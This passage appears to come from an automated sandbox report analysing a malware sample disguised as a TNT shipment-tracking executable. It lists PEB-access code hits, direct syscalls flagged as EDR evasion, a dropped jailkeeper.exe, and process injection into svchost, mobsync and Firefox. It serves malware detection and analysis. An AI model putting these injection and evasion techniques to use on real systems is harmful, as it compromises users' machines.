                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEB50 mov eax, dword ptr fs:[00000030h]3_2_03BDEB50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4B4B mov eax, dword ptr fs:[00000030h]3_2_03BE4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4B4B mov eax, dword ptr fs:[00000030h]3_2_03BE4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6B40 mov eax, dword ptr fs:[00000030h]3_2_03BC6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6B40 mov eax, dword ptr fs:[00000030h]3_2_03BC6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFAB40 mov eax, dword ptr fs:[00000030h]3_2_03BFAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD8B42 mov eax, dword ptr fs:[00000030h]3_2_03BD8B42
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38AA0 mov eax, dword ptr fs:[00000030h]3_2_03B38AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38AA0 mov eax, dword ptr fs:[00000030h]3_2_03B38AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86AA4 mov eax, dword ptr fs:[00000030h]3_2_03B86AA4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68A90 mov edx, dword ptr fs:[00000030h]3_2_03B68A90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04A80 mov eax, dword ptr fs:[00000030h]3_2_03C04A80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6AAEE mov eax, dword ptr fs:[00000030h]3_2_03B6AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6AAEE mov eax, dword ptr fs:[00000030h]3_2_03B6AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30AD0 mov eax, dword ptr fs:[00000030h]3_2_03B30AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B64AD0 mov eax, dword ptr fs:[00000030h]3_2_03B64AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B64AD0 mov eax, dword ptr fs:[00000030h]3_2_03B64AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA38 mov eax, dword ptr fs:[00000030h]3_2_03B6CA38
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA24 mov eax, dword ptr fs:[00000030h]3_2_03B6CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EA2E mov eax, dword ptr fs:[00000030h]3_2_03B5EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBCA11 mov eax, dword ptr fs:[00000030h]3_2_03BBCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEA60 mov eax, dword ptr fs:[00000030h]3_2_03BDEA60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov esi, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]3_2_03BBE9E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B649D0 mov eax, dword ptr fs:[00000030h]3_2_03B649D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]3_2_03BFA9D3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC69C0 mov eax, dword ptr fs:[00000030h]3_2_03BC69C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04940 mov eax, dword ptr fs:[00000030h]3_2_03C04940
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB892A mov eax, dword ptr fs:[00000030h]3_2_03BB892A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC892B mov eax, dword ptr fs:[00000030h]3_2_03BC892B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC912 mov eax, dword ptr fs:[00000030h]3_2_03BBC912
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC97C mov eax, dword ptr fs:[00000030h]3_2_03BBC97C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov edx, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0946 mov eax, dword ptr fs:[00000030h]3_2_03BB0946
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C008C0 mov eax, dword ptr fs:[00000030h]3_2_03C008C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC89D mov eax, dword ptr fs:[00000030h]3_2_03BBC89D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30887 mov eax, dword ptr fs:[00000030h]3_2_03B30887
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]3_2_03BFA8E4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]3_2_03B5E8C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov ecx, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00F180A9
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EEA155
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEA124 SetUnhandledExceptionFilter,0_2_00EEA124
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EA124 SetUnhandledExceptionFilter,2_2_001EA124
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001EA155

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtClose: Direct from: 0x77382B6C
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 6336Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3010008Jump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 887008Jump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F187B1 LogonUserW,0_2_00F187B1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3B3A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EC48D7
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F24C7F mouse_event,0_2_00F24C7F
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" Jump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F17CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F17CAF
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F1874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F1874B
                    Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
